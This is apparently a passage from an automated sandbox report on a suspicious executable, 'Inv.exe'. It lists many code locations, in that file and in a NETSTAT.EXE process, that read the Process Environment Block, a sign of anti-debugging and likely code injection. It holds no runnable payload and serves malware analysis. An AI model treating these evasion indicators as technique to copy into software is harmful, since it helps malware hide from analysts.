          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h]1_2_0195B02A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h]1_2_0195B02A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h]1_2_0195B02A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h]1_2_0195B02A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01960050 mov eax, dword ptr fs:[00000030h]1_2_01960050
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01960050 mov eax, dword ptr fs:[00000030h]1_2_01960050
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A02073 mov eax, dword ptr fs:[00000030h]1_2_01A02073
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A11074 mov eax, dword ptr fs:[00000030h]1_2_01A11074
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972397 mov eax, dword ptr fs:[00000030h]1_2_01972397
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A15BA5 mov eax, dword ptr fs:[00000030h]1_2_01A15BA5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197B390 mov eax, dword ptr fs:[00000030h]1_2_0197B390
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h]1_2_01951B8F
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h]1_2_01951B8F
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FD380 mov ecx, dword ptr fs:[00000030h]1_2_019FD380
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0138A mov eax, dword ptr fs:[00000030h]1_2_01A0138A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h]1_2_01974BAD
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h]1_2_01974BAD
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h]1_2_01974BAD
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h]1_2_019C53CA
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h]1_2_019C53CA
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]1_2_019703E2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]1_2_019703E2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]1_2_019703E2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]1_2_019703E2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]1_2_019703E2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h]1_2_019703E2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196DBE9 mov eax, dword ptr fs:[00000030h]1_2_0196DBE9
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0131B mov eax, dword ptr fs:[00000030h]1_2_01A0131B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194F358 mov eax, dword ptr fs:[00000030h]1_2_0194F358
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194DB40 mov eax, dword ptr fs:[00000030h]1_2_0194DB40
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h]1_2_01973B7A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h]1_2_01973B7A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194DB60 mov ecx, dword ptr fs:[00000030h]1_2_0194DB60
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18B58 mov eax, dword ptr fs:[00000030h]1_2_01A18B58
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h]1_2_0197D294
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h]1_2_0197D294
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h]1_2_0195AAB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h]1_2_0195AAB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197FAB0 mov eax, dword ptr fs:[00000030h]1_2_0197FAB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]1_2_019452A5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]1_2_019452A5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]1_2_019452A5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]1_2_019452A5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]1_2_019452A5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972ACB mov eax, dword ptr fs:[00000030h]1_2_01972ACB
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972AE4 mov eax, dword ptr fs:[00000030h]1_2_01972AE4
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h]1_2_0194AA16
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h]1_2_0194AA16
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01945210 mov eax, dword ptr fs:[00000030h]1_2_01945210
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01945210 mov ecx, dword ptr fs:[00000030h]1_2_01945210
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01945210 mov eax, dword ptr fs:[00000030h]1_2_01945210
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01945210 mov eax, dword ptr fs:[00000030h]1_2_01945210
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01963A1C mov eax, dword ptr fs:[00000030h]1_2_01963A1C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01958A0A mov eax, dword ptr fs:[00000030h]1_2_01958A0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h]1_2_01984A2C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h]1_2_01984A2C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18A62 mov eax, dword ptr fs:[00000030h]1_2_01A18A62
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019D4257 mov eax, dword ptr fs:[00000030h]1_2_019D4257
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949240 mov eax, dword ptr fs:[00000030h]1_2_01949240
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949240 mov eax, dword ptr fs:[00000030h]1_2_01949240
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949240 mov eax, dword ptr fs:[00000030h]1_2_01949240
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949240 mov eax, dword ptr fs:[00000030h]1_2_01949240
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198927A mov eax, dword ptr fs:[00000030h]1_2_0198927A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0EA55 mov eax, dword ptr fs:[00000030h]1_2_01A0EA55
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h]1_2_019FB260
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h]1_2_019FB260
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h]1_2_0197FD9B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h]1_2_0197FD9B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h]1_2_01A105AC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h]1_2_01A105AC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581 mov eax, dword ptr fs:[00000030h]1_2_01972581
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581 mov eax, dword ptr fs:[00000030h]1_2_01972581
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581 mov eax, dword ptr fs:[00000030h]1_2_01972581
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581 mov eax, dword ptr fs:[00000030h]1_2_01972581
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]1_2_01942D8A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]1_2_01942D8A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]1_2_01942D8A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]1_2_01942D8A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]1_2_01942D8A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h]1_2_01971DB5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h]1_2_01971DB5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h]1_2_01971DB5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019735A1 mov eax, dword ptr fs:[00000030h]1_2_019735A1
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h]1_2_01A0FDE2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h]1_2_01A0FDE2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h]1_2_01A0FDE2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h]1_2_01A0FDE2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]1_2_019C6DC9
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]1_2_019C6DC9
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]1_2_019C6DC9
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov ecx, dword ptr fs:[00000030h]1_2_019C6DC9
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]1_2_019C6DC9
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]1_2_019C6DC9
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019F8DF1 mov eax, dword ptr fs:[00000030h]1_2_019F8DF1
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h]1_2_0195D5E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h]1_2_0195D5E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18D34 mov eax, dword ptr fs:[00000030h]1_2_01A18D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0E539 mov eax, dword ptr fs:[00000030h]1_2_01A0E539
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]1_2_01953D34
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194AD30 mov eax, dword ptr fs:[00000030h]1_2_0194AD30
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019CA537 mov eax, dword ptr fs:[00000030h]1_2_019CA537
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]1_2_01974D3B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]1_2_01974D3B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]1_2_01974D3B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01967D50 mov eax, dword ptr fs:[00000030h]1_2_01967D50
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01983D43 mov eax, dword ptr fs:[00000030h]1_2_01983D43
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C3540 mov eax, dword ptr fs:[00000030h]1_2_019C3540
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h]1_2_0196C577
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h]1_2_0196C577
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195849B mov eax, dword ptr fs:[00000030h]1_2_0195849B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A014FB mov eax, dword ptr fs:[00000030h]1_2_01A014FB
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]1_2_019C6CF0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]1_2_019C6CF0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]1_2_019C6CF0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18CD6 mov eax, dword ptr fs:[00000030h]1_2_01A18CD6
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]1_2_019C6C0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]1_2_019C6C0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]1_2_019C6C0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]1_2_019C6C0A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]1_2_01A01C06
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]1_2_01A1740D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]1_2_01A1740D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]1_2_01A1740D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197BC2C mov eax, dword ptr fs:[00000030h]1_2_0197BC2C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h]1_2_019DC450
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h]1_2_019DC450
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A44B mov eax, dword ptr fs:[00000030h]1_2_0197A44B
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196746D mov eax, dword ptr fs:[00000030h]1_2_0196746D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01958794 mov eax, dword ptr fs:[00000030h]1_2_01958794
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]1_2_019C7794
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]1_2_019C7794
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]1_2_019C7794
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019837F5 mov eax, dword ptr fs:[00000030h]1_2_019837F5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196F716 mov eax, dword ptr fs:[00000030h]1_2_0196F716
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h]1_2_019DFF10
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h]1_2_019DFF10
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h]1_2_0197A70E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h]1_2_0197A70E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197E730 mov eax, dword ptr fs:[00000030h]1_2_0197E730
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h]1_2_01A1070D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h]1_2_01A1070D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h]1_2_01944F2E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h]1_2_01944F2E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18F6A mov eax, dword ptr fs:[00000030h]1_2_01A18F6A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195EF40 mov eax, dword ptr fs:[00000030h]1_2_0195EF40
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195FF60 mov eax, dword ptr fs:[00000030h]1_2_0195FF60
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]1_2_01A10EA5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]1_2_01A10EA5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]1_2_01A10EA5
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFE87 mov eax, dword ptr fs:[00000030h]1_2_019DFE87
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C46A7 mov eax, dword ptr fs:[00000030h]1_2_019C46A7
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019736CC mov eax, dword ptr fs:[00000030h]1_2_019736CC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FFEC0 mov eax, dword ptr fs:[00000030h]1_2_019FFEC0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01988EC7 mov eax, dword ptr fs:[00000030h]1_2_01988EC7
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019716E0 mov ecx, dword ptr fs:[00000030h]1_2_019716E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18ED6 mov eax, dword ptr fs:[00000030h]1_2_01A18ED6
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019576E2 mov eax, dword ptr fs:[00000030h]1_2_019576E2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h]1_2_0197A61C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h]1_2_0197A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42AE4 mov eax, dword ptr fs:[00000030h]4_2_02E42AE4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42ACB mov eax, dword ptr fs:[00000030h]4_2_02E42ACB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]4_2_02E152A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]4_2_02E152A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]4_2_02E152A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]4_2_02E152A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]4_2_02E152A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h]4_2_02E2AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h]4_2_02E2AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4FAB0 mov eax, dword ptr fs:[00000030h]4_2_02E4FAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h]4_2_02E4D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h]4_2_02E4D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h]4_2_02ECB260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h]4_2_02ECB260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8A62 mov eax, dword ptr fs:[00000030h]4_2_02EE8A62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5927A mov eax, dword ptr fs:[00000030h]4_2_02E5927A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]4_2_02E19240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]4_2_02E19240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]4_2_02E19240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]4_2_02E19240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDEA55 mov eax, dword ptr fs:[00000030h]4_2_02EDEA55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EA4257 mov eax, dword ptr fs:[00000030h]4_2_02EA4257
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h]4_2_02E54A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h]4_2_02E54A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]4_2_02E3A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E28A0A mov eax, dword ptr fs:[00000030h]4_2_02E28A0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]4_2_02E15210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E15210 mov ecx, dword ptr fs:[00000030h]4_2_02E15210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]4_2_02E15210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]4_2_02E15210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h]4_2_02E1AA16
